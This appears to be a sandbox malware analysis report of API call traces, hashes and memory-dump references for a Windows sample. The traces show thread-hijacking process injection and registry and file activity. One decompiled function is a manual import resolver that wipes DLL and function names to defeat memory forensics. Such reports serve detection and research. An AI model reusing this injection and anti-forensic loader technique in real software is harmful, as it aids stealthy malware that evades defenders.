    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			/* Decompiled import resolver from the injected image (memory dump at 0x00401389).
			   __edi is the image base; _a4 points to IMAGE_NT_HEADERS of that image.
			   Offsets used below: _a4+0x80 = import directory RVA, _a4+0x50 = SizeOfImage.
			   Each import descriptor is 0x14 bytes: +0x00 OriginalFirstThunk, +0x0c Name, +0x10 FirstThunk.
			   After every LoadLibraryA/GetProcAddress the DLL and function name strings are
			   overwritten with zeros, so a later memory dump does not reveal which imports were resolved. */
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;                           /* return value: 0 = success */
				_t33 =  *((intOrPtr*)(_a4 + 0x80));                  /* import directory RVA */
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;                                 /* first IMAGE_IMPORT_DESCRIPTOR */
				_t23 =  *((intOrPtr*)(_t34 + 0xc));                  /* descriptor->Name RVA */
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;                              /* DLL name string */
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));                 /* wipe the DLL name after use */
					_t27 =  *_t34;                                   /* OriginalFirstThunk (INT) */
					_t35 =  *((intOrPtr*)(_t34 + 0x10));             /* FirstThunk (IAT) */
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;                          /* current thunk entry */
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));     /* Name RVA of the next descriptor */
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;                    /* distance from INT entry to matching IAT slot */
						_t57 = _t28;
						L8:
						if(_t57 < 0) {                               /* high bit set: ordinal-style entry */
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;                      /* IMAGE_IMPORT_BY_NAME */
						}
						_t11 = _t28 + 2; // 0x2                      /* skip the 2-byte Hint, leaving the name */
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));         /* wipe the function name after use */
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;                        /* patch resolved address into the IAT */
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;                                 /* ERROR_PROC_NOT_FOUND */
						goto L19;
					}
					_t27 = _t35;                                     /* no INT: walk the IAT itself */
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;                                         /* ERROR_MOD_NOT_FOUND */
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
